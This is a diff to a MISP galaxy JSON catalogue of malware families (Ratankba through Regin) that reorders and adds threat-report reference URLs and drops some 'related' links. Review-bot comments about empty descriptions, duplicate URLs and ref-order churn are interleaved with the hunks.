- "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0"
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
],
"synonyms": [
"QUICKRIDE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "64b3c66b-fc70-4b5a-83a9-866cde2ccb0b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0",
"value": "Ratankba"
},
@@ -38367,6 +40419,21 @@
"uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d",
"value": "RatankbaPOS"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://github.com/FrenchCisco/RATel"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "56ac6980-4db4-4bac-8f8a-cebf5ead6308",
+ "value": "RATel"
+ },
{
"description": "",
"meta": {
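Review bot: the new RATel cluster is added with an empty `description`; with refs that include a ManageEngine CVE-2022-47966 advisory, the Tomiris write-up and the FrenchCisco/RATel GitHub repository, at least a one-line description of what the entry covers should ship with the new uuid, and the `type` array is left empty as well.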
@@ -38387,8 +40454,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos",
"http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite",
- "https://www.youtube.com/watch?v=fevGZs0EQu8",
- "https://threatvector.cylance.com/en_us/home/rawpos-malware.html"
+ "https://threatvector.cylance.com/en_us/home/rawpos-malware.html",
+ "https://www.youtube.com/watch?v=fevGZs0EQu8"
],
"synonyms": [],
"type": []
@@ -38414,8 +40481,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm",
- "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf",
- "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal"
+ "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
],
"synonyms": [],
"type": []
@@ -38428,16 +40495,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
- "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/",
"https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/",
- "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
+ "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html",
"http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
+ "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
+ "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf",
+ "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf",
+ "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
"https://www.f-secure.com/documents/996508/1030745/callisto-group",
"https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware",
- "https://www.f-secure.com/content/dam/f-secure/en/labs/whitepapers/Callisto_Group.pdf",
- "http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html"
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/"
],
"synonyms": [
"Crisis",
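Review bot: the RCS refs are only reordered here, but since the block is being rewritten anyway, the Intego URL ending in a dangling `?` (`.../discovered-by-intego-virus-team/?`) should lose that trailing character; as-is it will not deduplicate against the clean form of the same link.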
@@ -38479,24 +40547,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf",
"https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/",
- "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf"
+ "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/"
],
"synonyms": [
"GREYSTUFF"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d357a6ff-00e5-4fcc-8b9e-4a9d98a736e7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "69798a1e-1caf-4bc8-b4af-6508d8a26717",
"value": "RDAT"
},
@@ -38505,9 +40564,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot",
- "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
"http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html",
+ "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
"https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under"
],
"synonyms": [],
@@ -38521,21 +40580,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver",
- "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html",
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/",
+ "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "826c31ca-2617-47e4-b236-205da3881182",
"value": "Reaver"
},
@@ -38544,11 +40594,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker",
- "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
- "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
"https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
+ "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/",
- "https://d01a.github.io/raccoon-stealer/"
+ "https://d01a.github.io/raccoon-stealer/",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
+ "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
+ "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/"
],
"synonyms": [],
"type": []
@@ -38574,37 +40631,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves",
- "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/",
- "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
- "http://blog.macnica.net/blog/2017/12/post-8c22.html",
- "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware",
- "https://www.jpcert.or.jp/magazine/acreport-redleaves.html",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
+ "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware",
+ "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/",
+ "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "https://www.jpcert.or.jp/magazine/acreport-redleaves.html",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
"https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
+ "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html"
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "http://blog.macnica.net/blog/2017/12/post-8c22.html"
],
"synonyms": [
"BUGJUICE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "179f7228-6fcf-4664-a084-57bd296d0cde",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a70e93a7-3578-47e1-9926-0818979ed866",
"value": "RedLeaves"
},
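Review bot: the RedLeaves refs keep two Accenture URLs that differ only in the underscore pattern of the path segment (`t20180423T055005Z_w_` versus `t20180423T055005Z__w__`), and two JPCERT links to the same post on different hosts (`blogs.jpcert.or.jp/en/...` and `blog.jpcert.or.jp/.s/...`); since every line in this block is being touched anyway, collapse each pair to the canonical URL. The `related` removal at the end has the same concern raised on the Raspberry Robin hunk.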
@@ -38613,73 +40661,92 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer",
- "https://muha2xmad.github.io/malware-analysis/fullredline/",
- "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html",
- "https://securityscorecard.pathfactory.com/all/a-detailed-analysis",
- "https://securityscorecard.com/research/detailed-analysis-redline-stealer",
- "https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer",
- "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
- "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
- "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/",
- "https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
- "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/",
- "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://blog.netlab.360.com/purecrypter",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html",
- "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/",
- "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
- "https://cyber-anubis.github.io/malware%20analysis/redline/",
- "https://unit42.paloaltonetworks.com/bluesky-ransomware/",
- "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/",
- "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
- "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/",
- "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904",
- "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html",
- "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack",
"https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html",
- "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer",
- "https://asec.ahnlab.com/en/30445/",
- "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/",
- "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
- "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software",
- "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
- "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
- "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf",
- "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/",
- "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/",
- "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/",
- "https://unit42.paloaltonetworks.com/lapsus-group/",
- "https://asec.ahnlab.com/en/35981/",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://asec.ahnlab.com/ko/25837/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer",
- "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
"https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware",
- "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/"
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://unit42.paloaltonetworks.com/bluesky-ransomware/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html",
+ "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/",
+ "https://securityscorecard.pathfactory.com/all/a-detailed-analysis",
+ "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer",
+ "https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer",
+ "https://unit42.paloaltonetworks.com/lapsus-group/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://cyber-anubis.github.io/malware%20analysis/redline/",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service",
+ "https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://asec.ahnlab.com/en/35981/",
+ "https://securityscorecard.com/research/detailed-analysis-redline-stealer",
+ "https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/",
+ "https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/",
+ "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two",
+ "https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software",
+ "https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://blog.avast.com/adobe-acrobat-sign-malware",
+ "https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf",
+ "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
+ "https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904",
+ "https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/",
+ "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer",
+ "https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/",
+ "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf",
+ "https://securelist.com/malvertising-through-search-engines/108996/",
+ "https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html",
+ "https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
+ "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/",
+ "https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload",
+ "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html",
+ "https://www.bleepingcomputer.com/news/security/fake-valorant-cheats-on-youtube-infect-you-with-redline-stealer/",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://muha2xmad.github.io/malware-analysis/fullredline/",
+ "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-1014.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign",
+ "https://asec.ahnlab.com/en/30445/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/",
+ "https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html",
+ "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
],
"synonyms": [],
"type": []
@@ -38737,9 +40804,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf",
+ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf",
"https://twitter.com/ItsReallyNick/status/1136502701301346305",
- "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf"
],
"synonyms": [
"Dipsind"
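Review bot: This hunk (and the redshawl, regretlocker, remexi, remsec, remy, retadup, retefe and retro hunks that follow) only swaps the position of existing refs, e.g. the two fireeye.com URLs here trade places with no URL added or removed, so the change carries no content and inflates the diff. If the generator emits refs in whatever order the upstream source returns them, sorting the "refs" array deterministically before writing the JSON would keep future regenerations from producing this churn and make genuinely new refs visible at a glance.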
@@ -38754,8 +40821,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
],
"synonyms": [],
"type": []
@@ -38807,25 +40874,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns",
- "https://sensepost.com/discover/tools/reGeorg/",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
"https://github.com/sensepost/reGeorg",
- "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF"
+ "https://sensepost.com/discover/tools/reGeorg/",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2c62f08a-9bd9-11e8-9e20-db9ec0d2b277",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9ee0eb87-7648-4581-b301-7472a48946ad",
"value": "reGeorg"
},
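Review bot: The "related" array for reGeorg, linking dest-uuid 2c62f08a-9bd9-11e8-9e20-db9ec0d2b277 with type "similar" and an "almost-certain" estimative-language tag, is deleted outright and nothing in the hunk replaces it. Dropping a cross-cluster relation changes what MISP correlates, so either the removal is intentional and the PR description should say why (for example, the relation now lives in the target cluster), or the generator has stopped emitting "related" blocks and this is a regression to fix before merging. The ref additions in the same hunk (securelist defttorero) are fine.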
@@ -38834,27 +40893,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.regin",
- "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf",
- "https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/",
"https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://www.youtube.com/watch?v=jeLd-gw2bWo",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf",
"https://www.epicturla.com/previous-works/hitb2020-voltron-sta",
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf",
+ "https://www.youtube.com/watch?v=jeLd-gw2bWo",
"https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
